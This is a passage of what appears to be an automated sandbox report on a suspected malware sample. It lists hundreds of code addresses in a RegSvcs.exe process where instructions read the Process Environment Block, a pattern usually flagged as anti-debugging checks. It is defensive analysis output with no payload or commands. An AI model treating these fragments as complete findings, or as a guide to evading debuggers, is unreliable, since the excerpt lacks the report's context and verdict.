          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A002D mov eax, dword ptr fs:[00000030h]3_2_011A002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A002D mov eax, dword ptr fs:[00000030h]3_2_011A002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01190050 mov eax, dword ptr fs:[00000030h]3_2_01190050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01190050 mov eax, dword ptr fs:[00000030h]3_2_01190050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01232073 mov eax, dword ptr fs:[00000030h]3_2_01232073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01241074 mov eax, dword ptr fs:[00000030h]3_2_01241074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01179080 mov eax, dword ptr fs:[00000030h]3_2_01179080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F3884 mov eax, dword ptr fs:[00000030h]3_2_011F3884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F3884 mov eax, dword ptr fs:[00000030h]3_2_011F3884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AF0BF mov ecx, dword ptr fs:[00000030h]3_2_011AF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AF0BF mov eax, dword ptr fs:[00000030h]3_2_011AF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AF0BF mov eax, dword ptr fs:[00000030h]3_2_011AF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B90AF mov eax, dword ptr fs:[00000030h]3_2_011B90AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120B8D0 mov eax, dword ptr fs:[00000030h]3_2_0120B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120B8D0 mov ecx, dword ptr fs:[00000030h]3_2_0120B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120B8D0 mov eax, dword ptr fs:[00000030h]3_2_0120B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120B8D0 mov eax, dword ptr fs:[00000030h]3_2_0120B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120B8D0 mov eax, dword ptr fs:[00000030h]3_2_0120B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120B8D0 mov eax, dword ptr fs:[00000030h]3_2_0120B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0123131B mov eax, dword ptr fs:[00000030h]3_2_0123131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117F358 mov eax, dword ptr fs:[00000030h]3_2_0117F358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117DB40 mov eax, dword ptr fs:[00000030h]3_2_0117DB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A3B7A mov eax, dword ptr fs:[00000030h]3_2_011A3B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A3B7A mov eax, dword ptr fs:[00000030h]3_2_011A3B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117DB60 mov ecx, dword ptr fs:[00000030h]3_2_0117DB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01248B58 mov eax, dword ptr fs:[00000030h]3_2_01248B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01245BA5 mov eax, dword ptr fs:[00000030h]3_2_01245BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AB390 mov eax, dword ptr fs:[00000030h]3_2_011AB390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A2397 mov eax, dword ptr fs:[00000030h]3_2_011A2397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01181B8F mov eax, dword ptr fs:[00000030h]3_2_01181B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01181B8F mov eax, dword ptr fs:[00000030h]3_2_01181B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0122D380 mov ecx, dword ptr fs:[00000030h]3_2_0122D380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0123138A mov eax, dword ptr fs:[00000030h]3_2_0123138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F53CA mov eax, dword ptr fs:[00000030h]3_2_011F53CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F53CA mov eax, dword ptr fs:[00000030h]3_2_011F53CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A03E2 mov eax, dword ptr fs:[00000030h]3_2_011A03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A03E2 mov eax, dword ptr fs:[00000030h]3_2_011A03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A03E2 mov eax, dword ptr fs:[00000030h]3_2_011A03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A03E2 mov eax, dword ptr fs:[00000030h]3_2_011A03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A03E2 mov eax, dword ptr fs:[00000030h]3_2_011A03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A03E2 mov eax, dword ptr fs:[00000030h]3_2_011A03E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117AA16 mov eax, dword ptr fs:[00000030h]3_2_0117AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117AA16 mov eax, dword ptr fs:[00000030h]3_2_0117AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01193A1C mov eax, dword ptr fs:[00000030h]3_2_01193A1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01188A0A mov eax, dword ptr fs:[00000030h]3_2_01188A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0122B260 mov eax, dword ptr fs:[00000030h]3_2_0122B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0122B260 mov eax, dword ptr fs:[00000030h]3_2_0122B260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01248A62 mov eax, dword ptr fs:[00000030h]3_2_01248A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01179240 mov eax, dword ptr fs:[00000030h]3_2_01179240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01179240 mov eax, dword ptr fs:[00000030h]3_2_01179240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01179240 mov eax, dword ptr fs:[00000030h]3_2_01179240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01179240 mov eax, dword ptr fs:[00000030h]3_2_01179240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B927A mov eax, dword ptr fs:[00000030h]3_2_011B927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01204257 mov eax, dword ptr fs:[00000030h]3_2_01204257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AD294 mov eax, dword ptr fs:[00000030h]3_2_011AD294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AD294 mov eax, dword ptr fs:[00000030h]3_2_011AD294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118AAB0 mov eax, dword ptr fs:[00000030h]3_2_0118AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118AAB0 mov eax, dword ptr fs:[00000030h]3_2_0118AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AFAB0 mov eax, dword ptr fs:[00000030h]3_2_011AFAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011752A5 mov eax, dword ptr fs:[00000030h]3_2_011752A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011752A5 mov eax, dword ptr fs:[00000030h]3_2_011752A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011752A5 mov eax, dword ptr fs:[00000030h]3_2_011752A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011752A5 mov eax, dword ptr fs:[00000030h]3_2_011752A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011752A5 mov eax, dword ptr fs:[00000030h]3_2_011752A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A2ACB mov eax, dword ptr fs:[00000030h]3_2_011A2ACB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A2AE4 mov eax, dword ptr fs:[00000030h]3_2_011A2AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01248D34 mov eax, dword ptr fs:[00000030h]3_2_01248D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A4D3B mov eax, dword ptr fs:[00000030h]3_2_011A4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A4D3B mov eax, dword ptr fs:[00000030h]3_2_011A4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A4D3B mov eax, dword ptr fs:[00000030h]3_2_011A4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117AD30 mov eax, dword ptr fs:[00000030h]3_2_0117AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011FA537 mov eax, dword ptr fs:[00000030h]3_2_011FA537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01183D34 mov eax, dword ptr fs:[00000030h]3_2_01183D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01197D50 mov eax, dword ptr fs:[00000030h]3_2_01197D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B3D43 mov eax, dword ptr fs:[00000030h]3_2_011B3D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F3540 mov eax, dword ptr fs:[00000030h]3_2_011F3540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119C577 mov eax, dword ptr fs:[00000030h]3_2_0119C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119C577 mov eax, dword ptr fs:[00000030h]3_2_0119C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AFD9B mov eax, dword ptr fs:[00000030h]3_2_011AFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AFD9B mov eax, dword ptr fs:[00000030h]3_2_011AFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A2581 mov eax, dword ptr fs:[00000030h]3_2_011A2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A2581 mov eax, dword ptr fs:[00000030h]3_2_011A2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A2581 mov eax, dword ptr fs:[00000030h]3_2_011A2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A2581 mov eax, dword ptr fs:[00000030h]3_2_011A2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01172D8A mov eax, dword ptr fs:[00000030h]3_2_01172D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01172D8A mov eax, dword ptr fs:[00000030h]3_2_01172D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01172D8A mov eax, dword ptr fs:[00000030h]3_2_01172D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01172D8A mov eax, dword ptr fs:[00000030h]3_2_01172D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01172D8A mov eax, dword ptr fs:[00000030h]3_2_01172D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A1DB5 mov eax, dword ptr fs:[00000030h]3_2_011A1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A1DB5 mov eax, dword ptr fs:[00000030h]3_2_011A1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A1DB5 mov eax, dword ptr fs:[00000030h]3_2_011A1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A35A1 mov eax, dword ptr fs:[00000030h]3_2_011A35A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01228DF1 mov eax, dword ptr fs:[00000030h]3_2_01228DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118D5E0 mov eax, dword ptr fs:[00000030h]3_2_0118D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118D5E0 mov eax, dword ptr fs:[00000030h]3_2_0118D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F6C0A mov eax, dword ptr fs:[00000030h]3_2_011F6C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F6C0A mov eax, dword ptr fs:[00000030h]3_2_011F6C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F6C0A mov eax, dword ptr fs:[00000030h]3_2_011F6C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F6C0A mov eax, dword ptr fs:[00000030h]3_2_011F6C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01231C06 mov eax, dword ptr fs:[00000030h]3_2_01231C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124740D mov eax, dword ptr fs:[00000030h]3_2_0124740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124740D mov eax, dword ptr fs:[00000030h]3_2_0124740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124740D mov eax, dword ptr fs:[00000030h]3_2_0124740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011ABC2C mov eax, dword ptr fs:[00000030h]3_2_011ABC2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AA44B mov eax, dword ptr fs:[00000030h]3_2_011AA44B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120C450 mov eax, dword ptr fs:[00000030h]3_2_0120C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120C450 mov eax, dword ptr fs:[00000030h]3_2_0120C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119746D mov eax, dword ptr fs:[00000030h]3_2_0119746D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118849B mov eax, dword ptr fs:[00000030h]3_2_0118849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012314FB mov eax, dword ptr fs:[00000030h]3_2_012314FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F6CF0 mov eax, dword ptr fs:[00000030h]3_2_011F6CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F6CF0 mov eax, dword ptr fs:[00000030h]3_2_011F6CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F6CF0 mov eax, dword ptr fs:[00000030h]3_2_011F6CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01248CD6 mov eax, dword ptr fs:[00000030h]3_2_01248CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119F716 mov eax, dword ptr fs:[00000030h]3_2_0119F716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AA70E mov eax, dword ptr fs:[00000030h]3_2_011AA70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AA70E mov eax, dword ptr fs:[00000030h]3_2_011AA70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124070D mov eax, dword ptr fs:[00000030h]3_2_0124070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124070D mov eax, dword ptr fs:[00000030h]3_2_0124070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AE730 mov eax, dword ptr fs:[00000030h]3_2_011AE730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120FF10 mov eax, dword ptr fs:[00000030h]3_2_0120FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120FF10 mov eax, dword ptr fs:[00000030h]3_2_0120FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01174F2E mov eax, dword ptr fs:[00000030h]3_2_01174F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01174F2E mov eax, dword ptr fs:[00000030h]3_2_01174F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01248F6A mov eax, dword ptr fs:[00000030h]3_2_01248F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118EF40 mov eax, dword ptr fs:[00000030h]3_2_0118EF40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118FF60 mov eax, dword ptr fs:[00000030h]3_2_0118FF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F7794 mov eax, dword ptr fs:[00000030h]3_2_011F7794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F7794 mov eax, dword ptr fs:[00000030h]3_2_011F7794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F7794 mov eax, dword ptr fs:[00000030h]3_2_011F7794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01188794 mov eax, dword ptr fs:[00000030h]3_2_01188794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B37F5 mov eax, dword ptr fs:[00000030h]3_2_011B37F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AA61C mov eax, dword ptr fs:[00000030h]3_2_011AA61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011AA61C mov eax, dword ptr fs:[00000030h]3_2_011AA61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117C600 mov eax, dword ptr fs:[00000030h]3_2_0117C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117C600 mov eax, dword ptr fs:[00000030h]3_2_0117C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117C600 mov eax, dword ptr fs:[00000030h]3_2_0117C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A8E00 mov eax, dword ptr fs:[00000030h]3_2_011A8E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0122FE3F mov eax, dword ptr fs:[00000030h]3_2_0122FE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0117E620 mov eax, dword ptr fs:[00000030h]3_2_0117E620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01187E41 mov eax, dword ptr fs:[00000030h]3_2_01187E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01187E41 mov eax, dword ptr fs:[00000030h]3_2_01187E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01187E41 mov eax, dword ptr fs:[00000030h]3_2_01187E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01187E41 mov eax, dword ptr fs:[00000030h]3_2_01187E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01187E41 mov eax, dword ptr fs:[00000030h]3_2_01187E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01187E41 mov eax, dword ptr fs:[00000030h]3_2_01187E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119AE73 mov eax, dword ptr fs:[00000030h]3_2_0119AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119AE73 mov eax, dword ptr fs:[00000030h]3_2_0119AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119AE73 mov eax, dword ptr fs:[00000030h]3_2_0119AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119AE73 mov eax, dword ptr fs:[00000030h]3_2_0119AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0119AE73 mov eax, dword ptr fs:[00000030h]3_2_0119AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0118766D mov eax, dword ptr fs:[00000030h]3_2_0118766D
